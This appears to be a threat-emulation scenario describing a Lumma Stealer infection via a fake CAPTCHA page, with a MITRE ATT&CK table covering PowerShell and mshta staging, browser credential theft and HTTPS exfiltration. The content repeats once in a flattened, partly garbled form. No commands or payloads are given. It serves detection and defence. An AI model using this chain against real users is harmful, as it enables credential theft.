Context:
This scenario simulates a Lumma Stealer infection initiated through a fake CAPTCHA page. The user is redirected through attacker-controlled domains and instructed to run a PowerShell command that downloads and executes the Lumma payload via PowerShell and mshta.
Once deployed, Lumma steals browser credentials, performs host discovery, and communicates with multiple HTTPS C2 endpoints. The killchain includes all stages from initial access to exfiltration, together with the indicators and detection points observed during analysis.
MITRE ATT&CK Mapping
| Tactic |
Technique ID |
Technique Name |
Context |
| Initial Access |
T1189 |
Drive-by Compromise |
Victim visits a compromised website leading to forced redirects toward attacker infrastructure. |
| Execution |
T1204 |
User Execution |
User is tricked into running an obfuscated PowerShell command from the Windows Run dialog. |
| Execution |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
PowerShell one-liner downloads and executes remote second-stage payloads. |
| Defense Evasion / Execution |
T1218.005 |
Signed Binary Proxy Execution: Mshta |
mshta.exe executes attacker-hosted HTA/JS content as part of the staging process. |
| Command and Control |
T1105 |
Ingress Tool Transfer |
afc.zip and additional Lumma components are downloaded from attacker-controlled URLs. |
| Execution |
T1059 |
Command and Scripting Interpreter |
AutoIt-based modules (deci.com) and other components are executed on the host. |
| Defense Evasion |
T1027 |
Obfuscated/Encrypted File or Information |
Payloads, scripts, and PowerShell commands are heavily obfuscated to avoid detection. |
| Credential Access |
T1555.003 |
Credentials from Web Browsers |
Lumma steals Chrome/Edge credential SQLite databases (Login Data, Web Data). |
| Discovery |
T1518.001 |
Security Software Discovery |
Lumma checks firewall profiles to assess defensive posture. |
| Command and Control |
T1071.001 |
Application Layer Protocol: Web Protocols (HTTPS) |
Lumma establishes encrypted HTTPS sessions with multiple C2 domains. |
| Exfiltration |
T1041 |
Exfiltration Over C2 Channel |
Browser credentials and collected system data are exfiltrated via HTTPS POST requests. |
References
Fake CAPTCHA led to LUMMA - https://www.nccgroup.com/research-blog/fake-captcha-led-to-lumma/
Context:
This scenario simulates a Lumma Stealer infection initiated through a fake CAPTCHA page. The user is redirected through attacker-controlled domains and instructed to run a PowerShell command that downloads and executes the Lumma payload via PowerShell and mshta.
Once deployed, Lumma steals browser credentials, performs host discovery, and communicates with multiple HTTPS C2 endpoints. The killchain includes all stages from initial access to exfiltration, together with the indicators and detection points observed during analysis.
MITRE ATT&CK Mapping
mshta.exeexecutes attacker-hosted HTA/JS content as part of the staging process.afc.zipand additional Lumma components are downloaded from attacker-controlled URLs.deci.com) and other components are executed on the host.Login Data,Web Data).References
Fake CAPTCHA led to LUMMA - https://www.nccgroup.com/research-blog/fake-captcha-led-to-lumma/